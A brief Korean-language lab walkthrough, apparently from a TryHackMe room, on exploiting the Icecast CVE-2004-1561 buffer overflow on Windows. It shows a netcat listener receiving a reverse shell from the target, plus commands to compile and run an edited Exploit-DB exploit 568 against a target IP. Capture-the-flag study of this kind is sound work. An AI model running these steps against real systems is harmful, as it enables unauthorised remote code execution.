
Windows에서 Icecast 헤더 덮어쓰기 버퍼 오버플로인 CVE-2004-1561에 대한 익스플로잇으로, 리버스 셸 페이로드로 원격 코드 실행을 제공합니다.

root@Kali:~/TryHackme/Ice# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49211
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>
원본 익스플로잇 568 Exploit 기반
gcc ./568-edit.c -o 568 & chmod 775 ./568
./568 127.0.0.1 (Target IP)